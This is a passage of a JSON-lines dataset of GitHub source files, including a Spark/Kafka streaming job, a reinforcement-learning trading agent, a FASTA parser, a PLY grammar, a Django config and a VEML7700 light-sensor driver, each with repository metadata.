unbase64(redisEncodedDF.redisEvent).cast(\"string\"))\n\nredisDecodedDF.withColumn(\"customer\", from_json(\"redisEvent\", customerSchema)) \\\n .select(col(\"customer.*\")) \\\n .createOrReplaceTempView(\"CustomerRecords\")\n\nemailAndBirthDayStreamingDF = spark.sql(\"select * from CustomerRecords where email is not null and birthDay is not null\")\n\nemailAndBirthYearStreamingDF = emailAndBirthDayStreamingDF.withColumn(\"birthYear\", split(emailAndBirthDayStreamingDF['birthDay'], '-').getItem(0))\n\nstediRawStream = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\", \"stedi-events\") \\\n .option(\"startingOffsets\", \"earliest\") \\\n .load()\n \nstediStream = stediRawStream.selectExpr(\"cast(value as string) value\")\n\nstediStream.withColumn(\"value\", from_json(\"value\", stediSchema)) \\\n .select(col(\"value.*\")) \\\n .createOrReplaceTempView(\"CustomerRisk\")\n\ncustomerRiskStreamingDF = spark.sql(\"select customer, score from CustomerRisk\")\n\ncustomerProfile = emailAndBirthYearStreamingDF.join(customerRiskStreamingDF, expr(\"customer = email\"))\ncustomerProfile = customerProfile.select(\"customer\", \"score\", \"email\", \"birthYear\")\n\n# Write to console\n# customerProfile.writeStream \\\n# .outputMode(\"append\") \\\n# .format(\"console\") \\\n# .start() \\\n# .awaitTermination()\n\ncustomerProfile.selectExpr(\"cast(email as string) key\", \"to_json(struct(*)) value\") \\\n .writeStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"topic\", \"stedi-graph\") \\\n .option(\"checkpointLocation\",\"/tmp/kafkacheckpoint2\")\\\n .start() \\\n .awaitTermination()","repo_name":"Phileodontist/Udacity","sub_path":"Streaming/STEDI-Project/workspace/sparkpykafkajoin.py","file_name":"sparkpykafkajoin.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"143645129","text":"import asyncio\nimport aiohttp\nimport async_timeout\nimport socket\nimport time\n\n\nHOSTNAME = socket.gethostname()\nversion = \"1603315443\"\nBACKPACK_LOCK_URL = f\"http://localhost:4480/v1/slot/request?hostname={HOSTNAME}×tamp={int(time.time())}&version={version}\"\nWAIT_SLOT_TIMEOUT = 10\n\nasync def gethttp_req(url):\n async with aiohttp.ClientSession() as session:\n with async_timeout.timeout(10):\n async with session.get(url) as response:\n return await response.json()\n\nloop = asyncio.get_event_loop()\n\nasync def getlock():\n while True:\n try:\n print(f\"Requesting: {BACKPACK_LOCK_URL}\")\n data = await gethttp_req(BACKPACK_LOCK_URL)\n if data[\"status\"] == \"TRY_LATER\":\n print(f\"Cannot get lock. Retrying. Answer: {data}\")\n await asyncio.sleep(WAIT_SLOT_TIMEOUT)\n continue\n break\n except Exception as e:\n print(f\"Exception reached: {e}, wait {WAIT_SLOT_TIMEOUT} secs and continue\")\n await asyncio.sleep(WAIT_SLOT_TIMEOUT)\n return data\n\ndata = loop.run_until_complete(getlock())\nloop.close()\n\nconfig = data[\"info\"][\"config\"]\nif data[\"status\"] != \"LOCK_ACQUIRED\":\n version_new = data[\"info\"][\"version\"]\n print(f\"Version changed from meta server. Worker state: {data['status']} was: {version} now: {version_new}\")\n version = version_new\nelse:\n print(f\"Looks like it new run. Version: {version}\")\n\nprint(f\"Config is {config}\")\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/general/test_wrk.py","file_name":"test_wrk.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28127855010","text":"import random\nfrom math import exp\n\nfrom agent.agent import Agent\n\n\nclass ReinforcementLearning(Agent):\n type = \"RL\"\n\n '''\n q(state, action)\n The states are:\n Each combination of owning stocks: 2 exp 10 stocks \n \n The actions are:\n 3 for each stock: buy, sell\n 10 stocks\n \n The matrix is going to be 100x30\n \n c1 v1 c2 v2 c3 v3 c4 v4 n\n s1 0 0 0 0 0 0 0 0 0\n s2 0 0 0 0 0 0 0 0 0\n s3 0 0 0 0 0 0 0 0 0\n '''\n\n def __init__(self, central_bank, initial_cash=1000, soft_max=False):\n super().__init__(central_bank, initial_cash)\n self.current_step = 0\n self.q = []\n self.discount = 0.9\n self.total = 1000000\n self.learningRate = 0.8\n self.epsilon = 0.9\n self.rand_factor = 0.05\n self.reward_modifier = 100\n self.init_q_values()\n self.original_state = 0\n self.original_action = 0\n self.dec = (self.epsilon - 0.1) / self.total\n self.soft_max = False\n\n def init_q_values(self):\n num_col = 2 * len(self.central_bank.get_all_stock())\n num_lines = 2 ** len(self.central_bank.get_all_stock())\n\n for i in range(num_lines):\n tmp = [0 for _ in range(num_col)]\n # tmp.append(0)\n self.q.append(tmp)\n\n def get_state(self):\n l = len(self.central_bank.get_all_stock())\n owned_stocks = set(self.stocks_owned.keys())\n s = \"\".join([\"0\" if i in owned_stocks else \"1\" for i in range(l)])\n return int(s, 2)\n\n def learn(self):\n u = self.reward()\n prev_q = self.get_q(self.original_state, self.original_action)\n self.epsilon = max(self.epsilon - self.dec, 0.05)\n\n '''\n Q-function update\n '''\n pred_error = u + self.discount * self.get_max_q(self.get_state()) - prev_q\n\n new_q = prev_q + (self.learningRate * pred_error)\n self.q[self.original_state][self.original_action] = new_q\n return\n\n def _decide(self):\n self.original_state = self.get_state()\n self.epsilon -= self.dec\n act = 0\n if random.uniform(0, 1) < self.rand_factor:\n act = self.do_random_action(self.get_available_actions())\n else:\n if self.soft_max:\n act = self.do_soft_max()\n else:\n act = self.do_e_greedy()\n self.original_action = act\n\n def get_available_actions(self):\n owned_stocks = set(self.stocks_owned.keys())\n l = len(self.central_bank.get_all_stock())\n\n buy_actions = [2 * i for i in range(l) if self.central_bank.stocks[i].price <= self.cash]\n sell_actions = [2 * i + 1 for i in range(l) if i in owned_stocks]\n\n return [*buy_actions, *sell_actions]\n\n def do_e_greedy(self):\n valid_actions = self.get_available_actions()\n if random.uniform(0, 1) < self.rand_factor:\n return self.do_random_action(valid_actions)\n state = self.get_state()\n act = self.get_max_action_q(state, valid_actions)\n self.do_action(act)\n return act\n\n def do_soft_max(self):\n valid_actions = self.get_available_actions()\n act = -1\n l = len(valid_actions)\n tmp = self.get_q(self.get_state(), valid_actions[0]) / (self.epsilon * 100.0)\n\n cumulative = [exp(tmp)]\n for i in range(1, l):\n tmp = self.get_q(self.get_state(), valid_actions[i]) / (self.epsilon * 100.0)\n cumulative.append(exp(tmp) + cumulative[i - 1])\n total = cumulative[l - 1]\n cut = random.random() * total\n for i in range(l):\n if cut <= cumulative[i]:\n act = valid_actions[i]\n break\n if act >= 0:\n self.do_action(act)\n return act\n\n def get_random_available_action(self):\n valid_actions = self.get_available_actions()\n action = valid_actions[random.randint(0, len(valid_actions) - 1)]\n return action\n\n def do_random_action(self, valid_actions):\n action = valid_actions[random.randint(0, len(valid_actions) - 1)]\n self.do_action(action)\n return action\n\n def do_action(self, action):\n #if action == len(self.q[0])-1:\n # return\n stock_id = action // 2\n if action % 2:\n # odd, means sell\n max_sell = self.how_many_can_i_sell(stock_id)\n to_sell = random.randint(0, max_sell)\n self.sell(stock_id, to_sell)\n # print(\"sell: \" + str(stock_id) + \" quantity: \" + str(to_sell))\n else:\n # even, means buy\n max_buy = self.how_many_can_i_buy(stock_id) - 1\n to_buy = random.randint(0, max_buy)\n self.buy(stock_id, to_buy)\n # print(\"buy: \" + str(stock_id) + \" quantity: \" + str(to_buy) )\n\n def reward(self):\n l = len(self.stock_history)\n current_value = self.value_history[- 1]\n pre_value = self.value_history[- 2]\n\n r = current_value - pre_value\n #print(str(r))\n\n return r\n\n def get_q(self, original_state, original_action):\n return self.q[original_state][original_action]\n\n def get_max_q(self, state):\n return max(self.q[state])\n\n def get_max_action_q(self, state, valid_actions):\n max = float(\"-inf\")\n max_i = -1\n line = self.q[state]\n for i in range(len(valid_actions)):\n q_action = line[valid_actions[i]]\n if q_action > max:\n max = q_action\n max_i = valid_actions[i]\n return max_i\n","repo_name":"carolinacarreira/Autonomous-Agents-and-Multi-Agent-Systems","sub_path":"agent/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40340707867","text":"import os\r\nimport pandas as pd\r\nfrom lib import process_source_folder\r\nfrom lib import plot_roc_curve,balance_data\r\n\r\nCURRENT_PATH = os.path.abspath('')\r\nTRANING_SET_PATH = os.path.join(CURRENT_PATH,\"./dataset/training\")\r\nTESTING_SET_PATH = os.path.join(CURRENT_PATH,\"./dataset/testing\")\r\nSAVED_RAW_TRANING_DATA = os.path.join(CURRENT_PATH,\"./raw_traning_data.csv\")\r\nSAVED_RAW_TESTING_DATA = os.path.join(CURRENT_PATH,\"./raw_testing_data.csv\")\r\n\r\ndef load_data():\r\n #read traning data\r\n if (os.path.exists(SAVED_RAW_TRANING_DATA)):\r\n print (f'Load traning data from saved file {SAVED_RAW_TRANING_DATA}')\r\n raw_traning_data = pd.read_csv(SAVED_RAW_TRANING_DATA)\r\n else:\r\n print (f'read training data from {TRANING_SET_PATH}')\r\n raw_traning_data = process_source_folder(TRANING_SET_PATH)\r\n raw_traning_data.to_csv(SAVED_RAW_TRANING_DATA)\r\n for topic in raw_traning_data['topic'].unique():\r\n count = len(raw_traning_data[raw_traning_data['topic']==topic])\r\n print(f'{topic}: count: {count}')\r\n\r\n #read testing data\r\n if (os.path.exists(SAVED_RAW_TESTING_DATA)):\r\n print (f'Load testing data from saved file {SAVED_RAW_TESTING_DATA}')\r\n raw_testing_data = pd.read_csv(SAVED_RAW_TESTING_DATA)\r\n else:\r\n print (f'read testing data from {TESTING_SET_PATH}')\r\n raw_testing_data = process_source_folder(TESTING_SET_PATH)\r\n raw_testing_data.to_csv(SAVED_RAW_TESTING_DATA)\r\n for topic in raw_testing_data['topic'].unique():\r\n count = len(raw_testing_data[raw_testing_data['topic']==topic])\r\n print(f'{topic}: count: {count}')\r\n return raw_traning_data,raw_testing_data","repo_name":"woodychang0611/Ai_Cup_2020","sub_path":"load_data_set.py","file_name":"load_data_set.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38504390215","text":"\"\"\"\nCREATED AT 4/24/14 11:10 AM AS A PART OF Project DBSC\n\"\"\"\n\nfrom ply import yacc, lex\n\ntokens = ('NAME', 'REF', 'PRI', 'LP', 'RP', 'LSP', 'RSP', 'LCP', 'RCP', 'COMMA')\nt_NAME = r\"[A-Za-z0-9_]+\"\nt_REF = r\"\\*\"\nt_PRI = r\"\\+\"\nt_LP = r'\\('\nt_RP = r'\\)'\nt_LSP = r'\\['\nt_RSP = r\"\\]\"\nt_LCP = r'\\{'\nt_RCP = r'\\}'\nt_COMMA = r','\nt_ignore = ' \\n\\r\\tS;'\ndef t_error(t):\n print('Lexing Err @', t)\n\n\n# CREATE IF NOT EXISTS ...\ndef p_schema(p):\n \"\"\" schema : cine\n | schema cine\n \"\"\"\n if len(p) is 2:\n p[0] = [p[1]]\n else:\n p[0] = p[1] + [p[2]]\n\n\n# cine, CREATE TABLE IF NOT EXISTS\ndef p_cine(p):\n \"\"\" cine : term LCP terms RCP \"\"\"\n # cine 是一个 term - terms 对\n p[0] = (p[1], p[3])\n\n\ndef p_type(p):\n \"\"\" type : NAME LP terms RP \"\"\"\n # type 是一个 NAME - terms 对\n p[0] = (p[1], p[3])\n\n\ndef p_term(p):\n \"\"\" term : NAME\n | REF term\n | PRI term\n | term LSP type RSP\n \"\"\"\n # term是一个四元组\n # (NAME, isPrimary, isForeign, type/None)\n if len(p) is 2:\n p[0] = (p[1], False, False, None)\n if len(p) is 3:\n if p[1] is '+':\n p[0] = (p[2][0], True, p[2][2], None)\n if p[1] is '*':\n p[0] = (p[2][0], p[2][1], True, None)\n if len(p) is 5:\n p[0] = (p[1][0], p[1][1], p[1][2], p[3])\n\n\ndef p_terms(p):\n \"\"\" terms : term\n | terms COMMA\n | terms COMMA term\n \"\"\"\n # terms 是一或多个 term 构成的 list\n if len(p) is 2:\n p[0] = [p[1]]\n if len(p) is 3:\n p[0] = p[1]\n if len(p) is 4:\n p[0] = p[1] + [p[3]]\n\n\ndef parse(filename):\n lexer = lex.lex()\n parser = yacc.yacc()\n with open(filename) as file:\n schema = file.read()\n r = parser.parse(schema, debug=0)\n return r\n","repo_name":"EizoAssik/DB-ExCr","sub_path":"initial_tables/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72553896232","text":"import sys\ninput = sys.stdin.readline\n\nK, N = map(int,input().split())\nlenson = []\nfor _ in range(K):\n lenson.append(int(input()))\n\nstart, end = 1, max(lenson)\n\nwhile start <= end:\n mid = (start + end) // 2\n count = 0\n for son in lenson:\n count += son // mid\n if count >= N:\n start = mid + 1\n else:\n end = mid - 1\nprint(end)","repo_name":"jayyeong/Algorithm","sub_path":"Baekjoon/BOJproblem_5May/BOJ1654랜선자르기.py","file_name":"BOJ1654랜선자르기.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29179849535","text":"import re\nimport StringIO\n\n\nclass fasta(object):\n \"\"\"Create a fasta file object::\n\n f = fasta(filename_or_data,[ mode=\"r\",[ parse=True]])\n\n The API for the fasta file object closely follows the interface of the\n standard python file object.\n\n The mode can be one of:\n\n * 'r' - reading (default)\n * 's' - string data\n * 'f' - file object\n * 'a' - append\n * 'w' - write\n\n The file will be created if it doesn't exist for writing or appending; it\n will be truncated when opened for reading.\n\n For read mode, universal newline support is automatically invoked.\n\n By default, each FASTA entry is parsed into a dict with 'name' and\n 'sequence' values (parse=True). For 'raw' strings, set parse=False.\n \"\"\"\n\n __parse = True\n\n def __get_parse(self):\n return self.__parse\n\n def __set_parse(self, value):\n if not isinstance(value, bool):\n raise ValueError(\"'%s' is not a boolean.\" % value)\n self.__parse = value\n\n parse = property(fget=__get_parse,\n fset=__set_parse,\n doc=\"parse entry into dict (default=True)\")\n\n __mode = None\n\n def __get_mode(self):\n return self.__mode\n\n mode = property(fget=__get_mode,\n doc=\"file mode ('r', 's', 'f', 'w', or 'a')\")\n\n def __get_closed(self):\n return self.__fobj.closed\n\n closed = property(fget=__get_closed,\n doc=\"True if the file is closed\")\n\n __fobj = None\n __buff = 'x' # needs to be initialized with non-zero, non-'>' character\n\n def __init__(self, filename_or_data, mode='r', parse=True):\n \"\"\"x.__init__(...) initializes x\n\n see x.__class__.__doc__ for signature\"\"\"\n\n if mode[0] in ['r', 'a', 'w']:\n if mode == 'r':\n # force universal read mode\n mode = 'rU'\n self.__fobj = open(filename_or_data, mode)\n elif mode == 'f':\n self.__fobj = filename_or_data\n elif mode == 's':\n self.__fobj = StringIO.StringIO(filename_or_data)\n else:\n msg = \"mode string must start with 'r', 'a', 'w', 'f' or 's', \\\n not '%s'\" % mode[0]\n raise ValueError(msg)\n self.__mode = mode\n self.parse = parse\n\n def __iter__(self):\n \"\"\"x.__iter__() <==> iter(x)\"\"\"\n return self\n\n def __enter__(self):\n \"\"\"__enter__() -> self.\"\"\"\n return self\n\n def __exit__(self, type, value, traceback):\n \"\"\"__exit__(*excinfo) -> None. Closes the file.\"\"\"\n self.__fobj.close()\n\n def close(self):\n \"\"\"close() -> None or (perhaps) an integer. Close the file.\"\"\"\n return self.__fobj.close()\n\n def flush(self):\n \"\"\"flush() -> None. Flush the internal I/O buffer.\"\"\"\n return self.__fobj.flush()\n\n def next(self):\n \"\"\"next() -> the next entry, or raise StopIteration\"\"\"\n nxt = self.readentry()\n if nxt is None:\n self.__fobj.close()\n raise StopIteration\n return nxt\n\n def read(self):\n \"\"\"read() -> list of dict entries, reads the remainder of the data.\n\n Equivalent to readentries().\"\"\"\n return self.readentries()\n\n def readentry(self):\n \"\"\"readentry() -> next entry, as a dict.\n\n Return None at EOF.\"\"\"\n # read until the start of the next entry\n while not self.__buff.startswith('>'):\n self.__buff = self.__fobj.readline()\n if self.__buff == '':\n # EOF\n return None\n\n current = []\n current.append(self.__buff)\n self.__buff = self.__fobj.readline()\n while not self.__buff.startswith('>') and self.__buff != '':\n current.append(self.__buff)\n self.__buff = self.__fobj.readline()\n\n current_str = ''.join(current)\n if self.parse:\n return parse_fasta(current_str)\n return(current_str)\n\n def readentries(self):\n \"\"\"readentries() -> list of entries, each a dict.\n\n Call readentry() repeatedly and return a list of the entries read.\"\"\"\n return list(x for x in self)\n\n def write(self, entry, wrap_at=80, endline='\\n'):\n \"\"\"write(entry) -> None. Write entry dict to file.\n\n argument dict 'entry' must have keys 'name' and 'sequence', both\n with string values.\"\"\"\n if 'name' in entry and 'sequence' in entry:\n self.__fobj.write(entry2str(entry, wrap_at, endline))\n else:\n raise ValueError('entry missing either name or sequence')\n\n def write_entries(self, entries):\n \"\"\"write_entries(entries) -> None. Write list of entries to file.\n\n The equivalent of calling write for each entry.\"\"\"\n for entry in entries:\n self.write(entry)\n\n\ndef parse_fasta(entry):\n \"\"\"parse_fasta(entry) -> dict. entry is a string.\n\n Parse a string representation of a single FASTA entry into a dict.\n The returned dict has values for 'name' and 'sequence'.\"\"\"\n if not entry.startswith('>'):\n raise TypeError(\"entry does not start with '>'\")\n\n # the entry must include at least two lines (a label and a sequence)\n lines = re.split(r'[\\r\\n]+', entry)\n if len(lines) < 2:\n raise TypeError(\"entry needs at least two lines\")\n\n # name is everything on the first line after the '>'\n name = lines.pop(0)[1:].strip()\n # sequence is the rest of the entry\n sequence = ''.join(lines)\n\n return {'name': name, 'sequence': sequence}\n\n\ndef entry2str(entry, wrap_at=80, endline='\\n'):\n \"\"\"entry2str(entry[, wrap_at[, endline]]) -> a string. entry is a dict.\n\n Given an entry dict with string values for 'name' and 'sequence', will\n return a string in FASTA format. 'endline's (default \\\\n) will be inserted\n into the sequence every 'wrap_at' characters (default 80).\"\"\"\n s = []\n s.append('>%s%s' % (entry['name'], endline))\n # for the wrapping, DON'T use 'textwrap.wrap'. It is very slow because\n # it tries to be clever and find word breaks to wrap at.\n exploded_seq = list(entry['sequence'])\n wrap_points = range(0, len(exploded_seq), wrap_at)\n wrap_points.reverse()\n for i in wrap_points[:-1]:\n exploded_seq.insert(i, '\\n')\n s = s + exploded_seq + ['\\n']\n return ''.join(s)\n","repo_name":"ryanraaum/oldowan.fasta","sub_path":"oldowan/fasta/fasta.py","file_name":"fasta.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70000644392","text":"#!/usr/bin/python3\n\"\"\"Module that determines if a given data set represents a valid\"\"\"\nimport codecs\n\n\ndef validUTF8(data):\n \"\"\"Determines if a given data set represents a valid\n UTF-8 encoding\"\"\"\n for unit_data in data:\n if not (0 <= unit_data < 256):\n return False\n\n byte_data = bytes([unit_data])\n try:\n codecs.decode(byte_data, 'utf-8', errors='strict')\n except UnicodeDecodeError:\n return False\n\n return True\n","repo_name":"Ranci-18/alx-interview","sub_path":"0x04-utf8_validation/0-validate_utf8.py","file_name":"0-validate_utf8.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11553699762","text":"# encoding: utf-8\n\"\"\"\nSummary: small tools for spatial operation\n\"\"\"\nfrom django.contrib.gis.geos import LineString\nfrom django.contrib.gis.gdal import DataSource\nimport math\nfrom osgeo import ogr\n\ndef roadSegmentToText(lineString, direction = True):\n \"\"\"\n convert the lineString of the road segment into text description\n \n input:\n lineString: describes the road segement\n direction: boolean variable indicating the direction\n True means same direction as lineString\n False means reverse direction as lineString\n return:\n a string including the text description\n \"\"\" \n sPt = lineString.coords[0]\n ePt = lineString.coords[-1]\n \n if direction is not True:\n temp = ePt\n ePt = sPt\n sPt = temp\n \n orientation = math.atan2(ePt[1] - sPt[1], ePt[0] - sPt[0]) \n distance = lineString.length\n \n #determine orientation\n if orientation >= -math.pi / 4 and orientation < math.pi / 4:\n orientation = '东'\n \n elif orientation >= math.pi / 4 and orientation < 3 * math.pi / 4:\n orientation = '北'\n \n elif orientation >= 3 * math.pi / 4 and orientation < math.pi:\n orientation = '西'\n \n else:\n orientation = '南'\n \n #generate text\n desc = '向 %(oriet)s 步行 %(dist)d 米' % {'oriet':orientation, 'dist':int(distance)} \n \n return desc\n\ndef multiLineStringToLineString(original, desc):\n \"\"\"\n convert a shape file with geometry type of multilinestring to a new \n shape file with geometry type of linestring\n input:\n original, the file path of multiplinestring shapefile\n desc, the file path of new linestring shapefile\n return \n None\n \"\"\"\n oriDs = DataSource(original)\n \n driverName = \"ESRI Shapefile\"\n drv = ogr.GetDriverByName( driverName ) \n newDs = drv.CreateDataSource(desc)\n \n layerName = \"split_road\"\n newLyr = newDs.CreateLayer(layerName, None, ogr.wkbLineString)\n field_defn = ogr.FieldDefn( \"Name\", ogr.OFTString ) \n field_defn.SetWidth( 32 )\n newLyr.CreateField ( field_defn )\n \n oriLyr = oriDs[0] \n for feat in oriLyr:\n geom = feat.geom\n for subGeom in geom:\n feat = ogr.Feature(newLyr.GetLayerDefn())\n newGeom = ogr.CreateGeometryFromWkt(subGeom.wkt)\n feat.SetGeometry(newGeom)\n newLyr.CreateFeature(feat)\n \n newDs.Destroy()","repo_name":"dynaturtle/xiao-personal-code","sub_path":"Python Demo/pkumap/route/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26215593371","text":"# https://leetcode.com/problems/binary-search-tree-to-greater-sum-tree/\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def bstToGst(self, root: TreeNode) -> TreeNode:\n def traverse(root, arr):\n if root is None:\n return\n traverse(root.left, arr)\n arr.append(root)\n traverse(root.right, arr)\n\n arr = []\n traverse(root, arr)\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[i - 1].val += arr[i].val\n return root\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1001-1500/1038_binary-search-tree-to-greater-sum-tree_1_AC.py","file_name":"1038_binary-search-tree-to-greater-sum-tree_1_AC.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"41745138032","text":"from flask.json import JSONEncoder\nfrom model.Movie import Movie\n\n\nclass MovieEncoder(JSONEncoder):\n def default(self, o):\n if isinstance(o, Movie):\n return {'id': o.id,\n 'title': o.title,\n 'description': o.description,\n 'genre_ids': o.genre_ids,\n 'imdb_rating': o.imdb_rating,\n 'tmdb_rating': o.tmdb_rating,\n 'release_date': o.release_date,\n 'imdb_url': o.imdb_url}\n return super(MovieEncoder, self).default(o)\n","repo_name":"qwertzasd/movie-recommender","sub_path":"utility/MovieEncoder.py","file_name":"MovieEncoder.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37393638109","text":"from micropython import const\nimport robotling_lib.misc.ansi_color as ansi\nfrom robotling_lib.sensors.sensor_base import SensorBase\n\nfrom robotling_lib.platform.platform import platform as pf\nif pf.languageID == pf.LNG_CIRCUITPYTHON:\n from robotling_lib.platform.circuitpython.register.i2c_struct \\\n import UnaryStruct, ROUnaryStruct\n from robotling_lib.platform.circuitpython.register.i2c_bits import RWBits\n from robotling_lib.platform.circuitpython.register.i2c_bit import RWBit, ROBit\n from robotling_lib.platform.circuitpython.bus_device.i2c_device \\\n import I2CDevice\nelse:\n print(ansi.RED +\"ERROR: No matching libraries in `platform`.\" +ansi.BLACK)\n\n# pylint: disable=bad-whitespace\n__version__ = \"0.1.0.0\"\nCHIP_NAME = \"VEML7700\"\nCHAN_COUNT = const(1)\n# pylint: enable=bad-whitespace\n\n# ----------------------------------------------------------------------------\nclass VEML7700(SensorBase):\n \"\"\"Driver for the VEML7700 ambient light sensor.\"\"\"\n\n # pylint: disable=bad-whitespace\n # Ambient light sensor gain settings\n ALS_GAIN_1 = const(0x0)\n ALS_GAIN_2 = const(0x1)\n ALS_GAIN_1_8 = const(0x2)\n ALS_GAIN_1_4 = const(0x3)\n\n # Ambient light integration time settings\n ALS_25MS = const(0xC)\n ALS_50MS = const(0x8)\n ALS_100MS = const(0x0)\n ALS_200MS = const(0x1)\n ALS_400MS = const(0x2)\n ALS_800MS = const(0x3)\n\n # Gain value integers\n gain_values = {\n ALS_GAIN_2: 2,\n ALS_GAIN_1: 1,\n ALS_GAIN_1_4: 0.25,\n ALS_GAIN_1_8: 0.125,\n }\n # Integration time value integers\n integration_time_values = {\n ALS_25MS: 25,\n ALS_50MS: 50,\n ALS_100MS: 100,\n ALS_200MS: 200,\n ALS_400MS: 400,\n ALS_800MS: 800,\n }\n # pylint: enable=bad-whitespace\n\n # ALS - Ambient light sensor high resolution output data\n light = ROUnaryStruct(0x04, \"12}] {1:35} ({2}): {3}\"\n .format(cn, self._type, __version__,\n \"ok\" if self._isReady else \"FAILED\") +ansi.BLACK)\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n def integration_time_value(self):\n \"\"\" Integration time value in integer form.\n Used for calculating :meth:`resolution`.\n \"\"\"\n integration_time = self.light_integration_time\n return self.integration_time_values[integration_time]\n\n def gain_value(self):\n \"\"\" Gain value in integer form. Used for calculating :meth:`resolution`.\n \"\"\"\n gain = self.light_gain\n return self.gain_values[gain]\n\n def resolution(self):\n \"\"\" Calculate the :meth:`resolution`` necessary to calculate lux. Based on\n integration time and gain settings.\n \"\"\"\n resolution_at_max = 0.0036\n gain_max = 2\n integration_time_max = 800\n if (\n self.gain_value() == gain_max and\n self.integration_time_value() == integration_time_max\n ):\n return resolution_at_max\n return (\n resolution_at_max\n *(integration_time_max /self.integration_time_value())\n *(gain_max /self.gain_value())\n )\n\n @property\n def lux(self):\n \"\"\" Light value in lux.\n \"\"\"\n return self.resolution() *self.light\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n @property\n def is_ready(self):\n return self._isReady\n\n @property\n def channel_count(self):\n return CHAN_COUNT\n\n# ----------------------------------------------------------------------------\n","repo_name":"teuler/robotling_lib","sub_path":"sensors/lux_veml7700.py","file_name":"lux_veml7700.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"13890215029","text":"import os\n\n# Debug True/False\nDEBUG = False\n\n# Database connection\nDATABASE = 'bombolone'\n\n# ~\nENV = \"prod\"\n\n# ~\nPATH = 'http://www.bombolone.com'\n\n# ~\nPATH_API = 'http://www.bombolone.com'\n\n# ~\nPATH_LAYOUT = 'http://www.bombolone.com/static/layout/'\n\n# ~\nPROJECT_DIR = os.path.dirname(__file__)\n\n# ~\nPROJECT_STATIC_FILES = 'data/upload'\n\n# ~\nUP_FOLDER = os.path.join(PROJECT_DIR,'../../%s/' % PROJECT_STATIC_FILES)\n\n# ~\nUP_AVATARS_FOLDER = os.path.join(PROJECT_DIR,'../../%s/avatars/' % PROJECT_STATIC_FILES)\n\n# ~\nUP_IMAGE_FOLDER = os.path.join(PROJECT_DIR,'../../%s/images/' % PROJECT_STATIC_FILES)\n\n# ~\nPORT = 5000\n\n# ~\nSECRET_KEY = 'secret_key'\n\n# ~\nPORT_DATABASE = None\n\n# ~\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\n\n# ~\nALLOWED_ALL_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\n# ~\nEXTENSIONS = {'png' : 'PNG', 'jpg' : 'JPEG', 'jpeg' : 'JPEG', 'gif' : 'GIF'}\n\n# ~\nEXTENSIONS_REQUEST = {'png', 'jpg', 'jpeg', 'gif', 'css', 'js'}\n\n# activate user status\nACTIVATED = 1\n\n# not activate user status\nNOTACTIVATED = 0\n\n# ~\nJS_FILES_STEP_ONE = ['https://ajax.googleapis.com/ajax/libs/angularjs/1.2.13/angular.min.js',\n 'https://ajax.googleapis.com/ajax/libs/angularjs/1.2.13/angular-route.min.js']\n\n# ~\nJS_FILES_STEP_TWO = ['https://ajax.googleapis.com/ajax/libs/angularjs/1.2.13/angular-resource.min.js',\n '/static/js/lib/angular-ui.min.js']\n\n# ~\nCSS_BOOTSTRAP = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css'\n\n# ~\nCSS_FONT_AWESOME = 'https://maxcdn.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css'\n","repo_name":"Opentaste/bombolone","sub_path":"bombolone/config_production.py","file_name":"config_production.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"72"} +{"seq_id":"132890509","text":"#!/usr/bin/python3\n\nimport argparse\nimport logging\nimport json\nfrom urllib.parse import urlparse\nimport yt.wrapper as yt\nimport time\n\n\ndef get_host(url):\n return urlparse('http://' + url).netloc\n\n\ndef compare(snail_results, mapping):\n urls_with_diff = []\n hosts_to_check = set()\n\n for item in snail_results:\n if item['status'] != 'OK':\n continue\n if not 'players' in item or len(item['players']) == 0:\n continue\n for player_id in item['players']:\n if player_id not in 